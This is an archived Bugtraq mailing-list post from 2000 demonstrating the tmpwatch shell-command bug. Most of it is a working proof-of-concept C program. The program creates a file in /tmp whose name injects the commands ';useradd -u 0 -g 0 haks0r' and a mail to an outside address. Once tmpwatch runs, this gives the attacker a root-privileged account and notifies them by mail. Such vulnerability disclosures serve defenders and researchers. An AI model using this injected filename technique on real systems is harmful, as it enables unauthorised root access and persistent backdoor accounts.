5569571 2000-10-09  21:49  /30 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <13176>
Ärende: Re: tmpwatch executes shell commands
------------------------------------------------------------
From: "Alexander Y. Yurchenko" <grange@RT.MIPT.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.BSO.4.21.0010092216390.32268-100000@disorder.rt.mipt.ru>

Here is a simple example of my playing with tmpwatch bug

1. Execute following in /tmp

#include <stdio.h>

int main()
{
   FILE *f;
   char filename[100] = ";useradd -u 0 -g 0 haks0r;mail
haks0r@somehost.com<blablabla";

   if((f = fopen(filename, "a")) == 0) {
      perror("Could not create file");
      exit(1);
   }
   close(f);
}

2. cp /usr/sbin/adduser /tmp
3. Just wait for mail ;-)

---<*>---
  grange
(5569571) ------------------------------------------